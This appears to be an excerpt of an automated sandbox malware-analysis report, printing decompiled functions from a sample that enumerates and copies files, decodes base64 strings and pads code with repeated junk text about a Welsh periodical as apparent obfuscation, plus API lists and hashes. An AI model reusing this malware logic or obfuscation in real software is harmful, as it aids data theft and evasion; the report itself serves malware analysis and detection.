0x0040810a
0x0040810f
0x00408114
0x0040811c
0x00408121
0x00408129
0x0040812e
0x00408136
0x0040813b
0x00000000
0x0040813b
0x004080b2
0x004080b2
0x004080b5
0x004080ba
0x004080bf
0x004080c7
0x004080cc
0x004080d4
0x004080d9
0x004080e1
0x004080e6
0x004081dd
0x004081dd
0x004081dd
0x004081e0
0x004081e7
0x004081e9
0x004081ec
0x004081f1
0x004081f6
0x004081fe
0x00408203
0x0040820b
0x00408210
0x0040821c
0x00408221
0x00408226
0x00408226
0x0040822c
0x0040822c
0x0040803e
0x00408241
0x0040824c
0x0040824c
0x00408255
0x0040825d
0x00408265
0x0040826d
0x0040827e

APIs

Part of subcall function 004100ED: lstrcpy.KERNEL32(00000000,00000000), ref: 00410113

Part of subcall function 004101C6: lstrcpy.KERNEL32(00000000,?), ref: 004101F4
Part of subcall function 004101C6: lstrcat.KERNEL32(?,00000000), ref: 004101FE

Part of subcall function 00410208: lstrlen.KERNEL32(H@A,76636410,?,0040E45B,00414048,00000000,00414048,00000000), ref: 0041021C
Part of subcall function 00410208: lstrcpy.KERNEL32(00000000,?), ref: 00410244
Part of subcall function 00410208: lstrcat.KERNEL32(?,00000000), ref: 0041024F

Part of subcall function 0041018C: lstrcpy.KERNEL32(00000000,?), ref: 004101BC

FindFirstFileA.KERNEL32(?,?,00414064,00411BE1,?,?,?), ref: 00407FFE
StrCmpCA.SHLWAPI(?,00411BF0,?,?,?), ref: 0040801C
StrCmpCA.SHLWAPI(?,00411BF4,?,?,?), ref: 00408036
StrCmpCA.SHLWAPI(?,00411BE4,?,00411BE1,?,?,?), ref: 004080A8
StrCmpCA.SHLWAPI(?,?,?,?), ref: 004080FD

Part of subcall function 0041011F: lstrcpy.KERNEL32(00000000,?), ref: 0041013E

Part of subcall function 0040764C: CopyFileA.KERNEL32(?,?,00000001), ref: 004076BC

FindNextFileA.KERNEL32(?,?,?,?,?), ref: 0040823B
FindClose.KERNEL32(?,?,?,?), ref: 0040824C

Memory Dump Source

Source File: 00000000.00000002.417733641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.417733641.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000424000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000627000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_un78exGoa4.jbxd

Similarity

API ID: lstrcpy$FileFind$lstrcat$CloseCopyFirstNextlstrlen
String ID:
API String ID: 3801961486-0
Opcode ID: 97c0ba0f53260aac2d4a4c9fb50ee8a04108145d7e62f1e1a20fa45b875e117e
Instruction ID: 866588bb7e12e660ed2daffaa5f30144e51e1c616aeb4b23cc3d81a293344b4e
Opcode Fuzzy Hash: 97c0ba0f53260aac2d4a4c9fb50ee8a04108145d7e62f1e1a20fa45b875e117e
Instruction Fuzzy Hash: 18714E72D005199BCB10FBB5DD476CD7778AF04308B45416BFC14B32A2EB7CAA898AD6

Uniqueness

Uniqueness Score: -1.00%

Function 0040715C Relevance: 9.1, APIs: 6, Instructions: 81stringencryptionCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00407183
lstrlen.KERNEL32(?,00000001,?,?,00000000,00000000), ref: 0040719E
CryptStringToBinaryA.CRYPT32(?,00000000), ref: 004071A8
memcpy.MSVCRT ref: 0040720C
lstrcat.KERNEL32(00411BE1,00411BE1), ref: 00407229
lstrcat.KERNEL32(00411BE1,00411BE1), ref: 0040723D

Memory Dump Source

Source File: 00000000.00000002.417733641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.417733641.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000424000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000627000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_un78exGoa4.jbxd

Similarity

API ID: lstrcat$BinaryCryptStringlstrlenmemcpymemset
String ID:
API String ID: 1498829745-0
Opcode ID: c220b5ee0f4a6c9771e643bae9cb0b26df2ec9e358b1534d5c8f7e30f7934661
Instruction ID: 13965d4f725cd0f5beba530c4e11a97d478566d282ee02f3a387bf59242bd037
Opcode Fuzzy Hash: c220b5ee0f4a6c9771e643bae9cb0b26df2ec9e358b1534d5c8f7e30f7934661
Instruction Fuzzy Hash: D2215E71D00119EFDB009F94DC899EEBBBDFF08345F0440BAF506E2250E7349A459BA5

Uniqueness

Uniqueness Score: -1.00%

Function 00405430 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 42
encryptionmemoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405430(void** __ebx, void* __ecx, DWORD* __edi, char* _a4) {
				int _v8;
				BYTE* _t8;
				int _t9;

				_t1 =  &_a4; // 0x403e37
				 *__ebx = 0;
				_v8 = 0;
				 *__edi = 0;
				if(CryptStringToBinaryA( *_t1, 0, 1, 0, __edi, 0, 0) != 0) {
					_t8 = LocalAlloc(0x40,  *__edi);
					 *__ebx = _t8;
					if(_t8 != 0) {
						_t9 = CryptStringToBinaryA(_a4, 0, 1, _t8, __edi, 0, 0);
						_v8 = _t9;
						if(_t9 == 0) {
							 *__ebx = LocalFree( *__ebx);
						}
					}
				}
				return _v8;
			}

0x0040543e
0x00405441
0x00405443
0x00405446
0x00405450
0x00405456
0x0040545c
0x00405460
0x0040546c
0x00405472
0x00405477
0x00405481
0x00405481
0x00405477
0x00405460
0x00405488

APIs

CryptStringToBinaryA.CRYPT32(7>@,00000000,00000001,00000000,?,00000000,00000000), ref: 00405448
LocalAlloc.KERNEL32(00000040,?,?,?,00403E37,?), ref: 00405456
CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 0040546C
LocalFree.KERNEL32(?,?,?,00403E37,?), ref: 0040547B

Strings

7>@, xrefs: 0040543E

Memory Dump Source

Source File: 00000000.00000002.417733641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.417733641.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000424000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000627000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_un78exGoa4.jbxd

Similarity

API ID: BinaryCryptLocalString$AllocFree
String ID: 7>@
API String ID: 4291131564-3917246698
Opcode ID: 4e614777bed76179cf6fd1b90da360eec9bc7a38bced6ebebd85c15967d08a20
Instruction ID: 23214e36cc5736a63bc77655612683ac914ff5639563a3603fd6123d35b025ef
Opcode Fuzzy Hash: 4e614777bed76179cf6fd1b90da360eec9bc7a38bced6ebebd85c15967d08a20
Instruction Fuzzy Hash: 55F01970101634FFCB215F22DC89EDB7EA9EF4ABA0B004452F805A6290D2714A40DAA0

Uniqueness

Uniqueness Score: -1.00%

Function 0040188D Relevance: 99.3, APIs: 52, Strings: 14, Instructions: 293
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040188D(intOrPtr _a4, intOrPtr _a8, signed char* _a12) {
				signed char* _v8;
				char* _v12;
				char _v2012;
				void* _t135;
				intOrPtr _t170;
				signed char* _t208;
				char* _t210;
				intOrPtr _t221;
				char _t227;
				char* _t233;
				char* _t243;

				memset( &_v2012, 0, 0x7d0);
				strcat( &_v2012, "The");
				strcat( &_v2012, "Greal");
				strcat( &_v2012, "(Llangollen)");
				strcat( &_v2012, "was");
				strcat( &_v2012, "a");
				strcat( &_v2012, "19th-century");
				strcat( &_v2012, "Welsh-language");
				strcat( &_v2012, "periodical");
				strcat( &_v2012, "first");
				strcat( &_v2012, "published");
				strcat( &_v2012, "by");
				strcat( &_v2012, "William");
				strcat( &_v2012, "Williams");
				_t243 = "in";
				strcat( &_v2012, _t243);
				strcat( &_v2012, "Llangollen");
				strcat( &_v2012, _t243);
				_t210 = "1852";
				strcat( &_v2012, _t210);
				_t135 = 0;
				_v8 = _a12;
				if(_a8 <= 0) {
					L2:
					_a4 = _a4 + _t135;
					strcat( &_v2012, "The");
					strcat( &_v2012, "Greal");
					strcat( &_v2012, "(Llangollen)");
					strcat( &_v2012, "was");
					strcat( &_v2012, "a");
					strcat( &_v2012, "19th-century");
					strcat( &_v2012, "Welsh-language");
					strcat( &_v2012, "periodical");
					strcat( &_v2012, "first");
					strcat( &_v2012, "published");
					strcat( &_v2012, "by");
					strcat( &_v2012, "William");
					strcat( &_v2012, "Williams");
					strcat( &_v2012, _t243);
					strcat( &_v2012, "Llangollen");
					strcat( &_v2012, _t243);
					strcat( &_v2012, _t210);
					_t170 = _a4;
					if( *((char*)(_t170 - 2)) != 0x3d) {
						if( *((char*)(_t170 - 1)) == 0x3d) {
							_a12 = _a12 - 1;
							 *_a12 = 0;
						}
					} else {
						_t208 = _a12;
						 *((short*)(_t208 - 1)) = 0;
						_a12 = _t208 - 2;
					}
					strcat( &_v2012, "The");
					strcat( &_v2012, "Greal");
					strcat( &_v2012, "(Llangollen)");
					strcat( &_v2012, "was");
					strcat( &_v2012, "a");
					strcat( &_v2012, "19th-century");
					strcat( &_v2012, "Welsh-language");
					strcat( &_v2012, "periodical");
					strcat( &_v2012, "first");
					strcat( &_v2012, "published");
					strcat( &_v2012, "by");
					strcat( &_v2012, "William");
					strcat( &_v2012, "Williams");
					strcat( &_v2012, _t243);
					strcat( &_v2012, "Llangollen");
					strcat( &_v2012, _t243);
					strcat( &_v2012, _t210);
					 *_a12 = 0;
					return _v8;
				} else {
					goto L1;
				}
				do {
					L1:
					_a12 =  &(_a12[1]);
					 *_a12 =  *( *((char*)(_a4 + _t135)) + "@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@>@@@?456789:;<=@@@@@@@") << 0x00000002 |  *( *((char*)(_a4 + _t135 + 1)) + "@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@>@@@?456789:;<=@@@@@@@") >> 0x00000004;
					_t221 = _a4;
					_t233 = _t221 + _t135 + 2;
					_v12 = _t233;
					_a12 =  &(_a12[1]);
					 *_a12 =  *( *_t233 + "@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@>@@@?456789:;<=@@@@@@@") >> 0x00000002 |  *( *((char*)(_t221 + _t135 + 1)) + "@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@>@@@?456789:;<=@@@@@@@") << 0x00000004;
					_t227 =  *((char*)(_a4 + _t135 + 3));
					_a12 =  &(_a12[1]);
					_t135 = _t135 + 4;
					 *_a12 =  *( *_v12 + "@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@>@@@?456789:;<=@@@@@@@") << 0x00000006 |  *(_t227 + "@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@>@@@?456789:;<=@@@@@@@");
				} while (_t135 < _a8);
				goto L2;
			}

0x004018a7
0x004018bf
0x004018cd
0x004018db
0x004018e9
0x004018f7
0x00401905
0x00401913
0x00401924
0x00401932
0x00401940
0x0040194e
0x0040195c
0x0040196a
0x0040196c
0x00401979
0x00401987
0x00401994
0x00401996
0x004019a3
0x004019a8
0x004019ad
0x004019b3
0x00401a40
0x00401a40
0x00401a4f
0x00401a5d
0x00401a6b
0x00401a79
0x00401a87
0x00401a95
0x00401aa3
0x00401ab1
0x00401ac2
0x00401ad0
0x00401ade
0x00401aec
0x00401afa
0x00401b04
0x00401b12
0x00401b1c
0x00401b29
0x00401b2b
0x00401b34
0x00401b4b
0x00401b50
0x00401b53
0x00401b53
0x00401b36
0x00401b36
0x00401b39
0x00401b42
0x00401b42
0x00401b62
0x00401b70
0x00401b7e
0x00401b8c
0x00401b9a
0x00401ba8
0x00401bb6
0x00401bc4
0x00401bd5
0x00401be3
0x00401bf1
0x00401bff
0x00401c0d
0x00401c17
0x00401c25
0x00401c2f
0x00401c3c
0x00401c45
0x00401c4d
0x00000000
0x00000000
0x00000000
0x004019b9
0x004019b9
0x004019dc
0x004019df
0x004019e1
0x004019e4
0x004019f3
0x00401a0a
0x00401a0d
0x00401a18
0x00401a2f
0x00401a32
0x00401a35
0x00401a37
0x00000000

APIs

memset.MSVCRT ref: 004018A7
strcat.MSVCRT(?,The), ref: 004018BF
strcat.MSVCRT(?,Greal), ref: 004018CD
strcat.MSVCRT(?,(Llangollen)), ref: 004018DB
strcat.MSVCRT(?,was), ref: 004018E9
strcat.MSVCRT(?,00411C18), ref: 004018F7
strcat.MSVCRT(?,19th-century), ref: 00401905
strcat.MSVCRT(?,Welsh-language), ref: 00401913
strcat.MSVCRT(?,periodical), ref: 00401924
strcat.MSVCRT(?,first), ref: 00401932
strcat.MSVCRT(?,published), ref: 00401940
strcat.MSVCRT(?,00411C5C), ref: 0040194E
strcat.MSVCRT(?,William), ref: 0040195C
strcat.MSVCRT(?,Williams), ref: 0040196A
strcat.MSVCRT(?,00411C74), ref: 00401979
strcat.MSVCRT(?,Llangollen), ref: 00401987
strcat.MSVCRT(?,00411C74), ref: 00401994
strcat.MSVCRT(?,1852), ref: 004019A3
strcat.MSVCRT(?,The), ref: 00401A4F
strcat.MSVCRT(?,Greal), ref: 00401A5D
strcat.MSVCRT(?,(Llangollen)), ref: 00401A6B
strcat.MSVCRT(?,was), ref: 00401A79
strcat.MSVCRT(?,00411C18), ref: 00401A87
strcat.MSVCRT(?,19th-century), ref: 00401A95
strcat.MSVCRT(?,Welsh-language), ref: 00401AA3
strcat.MSVCRT(?,periodical), ref: 00401AB1
strcat.MSVCRT(?,first), ref: 00401AC2
strcat.MSVCRT(?,published), ref: 00401AD0
strcat.MSVCRT(?,00411C5C), ref: 00401ADE
strcat.MSVCRT(?,William), ref: 00401AEC
strcat.MSVCRT(?,Williams), ref: 00401AFA
strcat.MSVCRT(?,00411C74), ref: 00401B04
strcat.MSVCRT(?,Llangollen), ref: 00401B12
strcat.MSVCRT(?,00411C74), ref: 00401B1C
strcat.MSVCRT(?,1852), ref: 00401B29
strcat.MSVCRT(?,The), ref: 00401B62
strcat.MSVCRT(?,Greal), ref: 00401B70
strcat.MSVCRT(?,(Llangollen)), ref: 00401B7E
strcat.MSVCRT(?,was), ref: 00401B8C
strcat.MSVCRT(?,00411C18), ref: 00401B9A
strcat.MSVCRT(?,19th-century), ref: 00401BA8
strcat.MSVCRT(?,Welsh-language), ref: 00401BB6
strcat.MSVCRT(?,periodical), ref: 00401BC4
strcat.MSVCRT(?,first), ref: 00401BD5
strcat.MSVCRT(?,published), ref: 00401BE3
strcat.MSVCRT(?,00411C5C), ref: 00401BF1
strcat.MSVCRT(?,William), ref: 00401BFF
strcat.MSVCRT(?,Williams), ref: 00401C0D
strcat.MSVCRT(?,00411C74), ref: 00401C17
strcat.MSVCRT(?,Llangollen), ref: 00401C25
strcat.MSVCRT(?,00411C74), ref: 00401C2F
strcat.MSVCRT(?,1852), ref: 00401C3C

Strings

first, xrefs: 0040192C, 00401ABC, 00401BCF
Llangollen, xrefs: 00401981, 00401B0C, 00401C1F
periodical, xrefs: 0040191E, 00401AAB, 00401BBE
William, xrefs: 00401956, 00401AE6, 00401BF9
(Llangollen), xrefs: 004018D5, 00401A65, 00401B78
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@>@@@?456789:;<=@@@@@@@, xrefs: 004019C5, 004019CB, 004019ED, 004019F9, 00401A1D, 00401A26
19th-century, xrefs: 004018FF, 00401A8F, 00401BA2
1852, xrefs: 00401996, 004019A1, 00401B27, 00401C3A
The, xrefs: 004018B9, 00401A49, 00401B5C
Welsh-language, xrefs: 0040190D, 00401A9D, 00401BB0
published, xrefs: 0040193A, 00401ACA, 00401BDD
Williams, xrefs: 00401964, 00401AF4, 00401C07
Greal, xrefs: 004018C7, 00401A57, 00401B6A
was, xrefs: 004018E3, 00401A73, 00401B86

Memory Dump Source

Source File: 00000000.00000002.417733641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.417733641.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000424000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000627000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_un78exGoa4.jbxd

Similarity

API ID: strcat$memset
String ID: (Llangollen)$1852$19th-century$@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@>@@@?456789:;<=@@@@@@@$Greal$Llangollen$The$Welsh-language$William$Williams$first$periodical$published$was
API String ID: 3737753769-164826601
Opcode ID: cf6a0bc05ae04a8919962419728690b2b09a8fdc3d330ce44a95518ab7852e1c
Instruction ID: 1c04743a2192d5610d97c6d8fd345c82286da3dbaca30ef882c9722a45686304
Opcode Fuzzy Hash: cf6a0bc05ae04a8919962419728690b2b09a8fdc3d330ce44a95518ab7852e1c
Instruction Fuzzy Hash: 40A10FB2D842AC6ACB90DBA0DC85ECA7BBCDF44604F501493A609F3551EA7CA7C4CF95

Uniqueness

Uniqueness Score: -1.00%

Function 0040DC97 Relevance: 70.7, APIs: 34, Strings: 13, Instructions: 154
stringCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E0040DC97() {
				char* _t36;
				char* _t110;
				void* _t114;
				char* _t115;
				void* _t118;
				void* _t124;

				asm("sbb eax, [ecx]");
				strcat(_t36, ??);
				strcat(_t118 - 0x81c, "Greal");
				strcat(_t118 - 0x81c, "(Llangollen)");
				strcat(_t118 - 0x81c, "was");
				strcat(_t118 - 0x81c, "a");
				strcat(_t118 - 0x81c, "19th-century");
				strcat(_t118 - 0x81c, "Welsh-language");
				strcat(_t118 - 0x81c, "periodical");
				strcat(_t118 - 0x81c, "first");
				strcat(_t118 - 0x81c, "published");
				strcat(_t118 - 0x81c, "by");
				strcat(_t118 - 0x81c, "William");
				strcat(_t118 - 0x81c, "Williams");
				strcat(_t118 - 0x81c, _t110);
				strcat(_t118 - 0x81c, "Llangollen");
				strcat(_t118 - 0x81c, _t110);
				strcat(_t118 - 0x81c, _t115);
				E004100ED(_t118 - 0xc, _t124, 0x411be1);
				strcat(_t118 - 0x81c, "The");
				strcat(_t118 - 0x81c, "Greal");
				strcat(_t118 - 0x81c, "(Llangollen)");
				strcat(_t118 - 0x81c, "was");
				strcat(_t118 - 0x81c, "a");
				strcat(_t118 - 0x81c, "19th-century");
				strcat(_t118 - 0x81c, "Welsh-language");
				strcat(_t118 - 0x81c, "periodical");
				strcat(_t118 - 0x81c, "first");
				strcat(_t118 - 0x81c, "published");
				strcat(_t118 - 0x81c, "by");
				strcat(_t118 - 0x81c, "William");
				strcat(_t118 - 0x81c, "Williams");
				strcat(_t118 - 0x81c, _t110);
				strcat(_t118 - 0x81c, "Llangollen");
				strcat(_t118 - 0x81c, _t110);
				strcat(_t118 - 0x81c, "1852");
				_pop(_t114);
				if(_t124 != 0 && _t124 == 0) {
				}
				E00401010(_t114); // executed
				if(_t124 != 0 && _t124 == 0) {
				}
				E00401010(_t114); // executed
				_push("The");
			}

0x0040dc97
0x0040dc9b
0x0040dca9
0x0040dcb7
0x0040dcc5
0x0040dcd3
0x0040dce1
0x0040dcef
0x0040dcfd
0x0040dd0e
0x0040dd1c
0x0040dd2a
0x0040dd38
0x0040dd46
0x0040dd50
0x0040dd5e
0x0040dd68
0x0040dd75
0x0040dd81
0x0040dd92
0x0040dda0
0x0040ddae
0x0040ddbc
0x0040ddca
0x0040ddd8
0x0040dde6
0x0040ddf4
0x0040de05
0x0040de13
0x0040de21
0x0040de2f
0x0040de3d
0x0040de47
0x0040de55
0x0040de5f
0x0040de71
0x0040de74
0x0040de75
0x0040de75
0x0040de7a
0x0040de7f
0x0040de7f
0x0040de84
0x0040de8f

APIs

strcat.MSVCRT(?,The), ref: 0040DC9B
strcat.MSVCRT(?,Greal), ref: 0040DCA9
strcat.MSVCRT(?,(Llangollen)), ref: 0040DCB7
strcat.MSVCRT(?,was), ref: 0040DCC5
strcat.MSVCRT(?,00411C18), ref: 0040DCD3
strcat.MSVCRT(?,19th-century), ref: 0040DCE1
strcat.MSVCRT(?,Welsh-language), ref: 0040DCEF
strcat.MSVCRT(?,periodical), ref: 0040DCFD
strcat.MSVCRT(?,first), ref: 0040DD0E
strcat.MSVCRT(?,published), ref: 0040DD1C
strcat.MSVCRT(?,00411C5C), ref: 0040DD2A
strcat.MSVCRT(?,William), ref: 0040DD38
strcat.MSVCRT(?,Williams), ref: 0040DD46
strcat.MSVCRT(?,00411C74), ref: 0040DD50
strcat.MSVCRT(?,Llangollen), ref: 0040DD5E
strcat.MSVCRT(?,00411C74), ref: 0040DD68
strcat.MSVCRT(?,1852), ref: 0040DD75

Part of subcall function 004100ED: lstrcpy.KERNEL32(00000000,00000000), ref: 00410113

strcat.MSVCRT(?,The,00411BE1), ref: 0040DD92
strcat.MSVCRT(?,Greal), ref: 0040DDA0
strcat.MSVCRT(?,(Llangollen)), ref: 0040DDAE
strcat.MSVCRT(?,was), ref: 0040DDBC
strcat.MSVCRT(?,00411C18), ref: 0040DDCA
strcat.MSVCRT(?,19th-century), ref: 0040DDD8
strcat.MSVCRT(?,Welsh-language), ref: 0040DDE6
strcat.MSVCRT(?,periodical), ref: 0040DDF4
strcat.MSVCRT(?,first), ref: 0040DE05
strcat.MSVCRT(?,published), ref: 0040DE13
strcat.MSVCRT(?,00411C5C), ref: 0040DE21
strcat.MSVCRT(?,William), ref: 0040DE2F
strcat.MSVCRT(?,Williams), ref: 0040DE3D
strcat.MSVCRT(?,00411C74), ref: 0040DE47
strcat.MSVCRT(?,Llangollen), ref: 0040DE55
strcat.MSVCRT(?,00411C74), ref: 0040DE5F
strcat.MSVCRT(?,1852), ref: 0040DE71

Strings

first, xrefs: 0040DD08, 0040DDFF
Llangollen, xrefs: 0040DD58, 0040DE4F
periodical, xrefs: 0040DCF7, 0040DDEE
William, xrefs: 0040DD32, 0040DE29
(Llangollen), xrefs: 0040DCB1, 0040DDA8
19th-century, xrefs: 0040DCDB, 0040DDD2
1852, xrefs: 0040DD73, 0040DE64, 0040DE6F
The, xrefs: 0040DD8C
Welsh-language, xrefs: 0040DCE9, 0040DDE0
published, xrefs: 0040DD16, 0040DE0D
Williams, xrefs: 0040DD40, 0040DE37
Greal, xrefs: 0040DC9D, 0040DD9A
was, xrefs: 0040DCBF, 0040DDB6

Memory Dump Source

Source File: 00000000.00000002.417733641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.417733641.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000424000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000627000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_un78exGoa4.jbxd

Similarity

API ID: strcat$lstrcpy
String ID: (Llangollen)$1852$19th-century$Greal$Llangollen$The$Welsh-language$William$Williams$first$periodical$published$was
API String ID: 2455385555-3789696708
Opcode ID: 1761315132d04db79856fe7e2164092f298fe85d719b222a0dc41f11e07c5a9e
Instruction ID: c29fb10757d984d99d559b6c03de8734a00700c7d5a72921d35120c958ff1d6a
Opcode Fuzzy Hash: 1761315132d04db79856fe7e2164092f298fe85d719b222a0dc41f11e07c5a9e
Instruction Fuzzy Hash: E7416EB6DC021C6ACB20B7A4DD49ECE73FCAF54700F11C5A2E645E2055EA789A868F94

Uniqueness

Uniqueness Score: -1.00%

Function 0040E6D8 Relevance: 54.3, APIs: 19, Strings: 12, Instructions: 75
stringCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E0040E6D8() {
				char* _t18;
				char* _t53;
				char* _t56;
				void* _t57;

				asm("sbb eax, [ecx]");
				strcat(_t18, ??);
				strcat(_t57 - 0x81c, "Greal");
				strcat(_t57 - 0x81c, "(Llangollen)");
				strcat(_t57 - 0x81c, "was");
				strcat(_t57 - 0x81c, "a");
				strcat(_t57 - 0x81c, "19th-century");
				strcat(_t57 - 0x81c, "Welsh-language");
				strcat(_t57 - 0x81c, "periodical");
				strcat(_t57 - 0x81c, "first");
				strcat(_t57 - 0x81c, "published");
				strcat(_t57 - 0x81c, "by");
				strcat(_t57 - 0x81c, "William");
				strcat(_t57 - 0x81c, "Williams");
				strcat(_t57 - 0x81c, _t53);
				strcat(_t57 - 0x81c, "Llangollen");
				strcat(_t57 - 0x81c, _t53);
				strcat(_t57 - 0x81c, _t56);
				CloseHandle( *(_t57 - 0x10));
				ExitProcess(0);
			}

0x0040e6d8
0x0040e6dc
0x0040e6ea
0x0040e6f8
0x0040e706
0x0040e714
0x0040e722
0x0040e730
0x0040e73e
0x0040e74f
0x0040e75d
0x0040e76b
0x0040e779
0x0040e787
0x0040e791
0x0040e79f
0x0040e7a9
0x0040e7b6
0x0040e7bd
0x0040e7c5

APIs

strcat.MSVCRT(?,The), ref: 0040E6DC
strcat.MSVCRT(?,Greal), ref: 0040E6EA
strcat.MSVCRT(?,(Llangollen)), ref: 0040E6F8
strcat.MSVCRT(?,was), ref: 0040E706
strcat.MSVCRT(?,00411C18), ref: 0040E714
strcat.MSVCRT(?,19th-century), ref: 0040E722
strcat.MSVCRT(?,Welsh-language), ref: 0040E730
strcat.MSVCRT(?,periodical), ref: 0040E73E
strcat.MSVCRT(?,first), ref: 0040E74F
strcat.MSVCRT(?,published), ref: 0040E75D
strcat.MSVCRT(?,00411C5C), ref: 0040E76B
strcat.MSVCRT(?,William), ref: 0040E779
strcat.MSVCRT(?,Williams), ref: 0040E787
strcat.MSVCRT(?,00411C74), ref: 0040E791
strcat.MSVCRT(?,Llangollen), ref: 0040E79F
strcat.MSVCRT(?,00411C74), ref: 0040E7A9
strcat.MSVCRT(?,1852), ref: 0040E7B6
CloseHandle.KERNEL32(?), ref: 0040E7BD
ExitProcess.KERNEL32 ref: 0040E7C5

Strings

first, xrefs: 0040E749
(Llangollen), xrefs: 0040E6EC
Llangollen, xrefs: 0040E799
19th-century, xrefs: 0040E71C
1852, xrefs: 0040E7B4
Welsh-language, xrefs: 0040E72A
published, xrefs: 0040E757
Williams, xrefs: 0040E781
periodical, xrefs: 0040E738
William, xrefs: 0040E773
Greal, xrefs: 0040E6E4
was, xrefs: 0040E700

Memory Dump Source

Source File: 00000000.00000002.417733641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.417733641.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000424000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000627000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_un78exGoa4.jbxd

Similarity

API ID: strcat$CloseExitHandleProcess
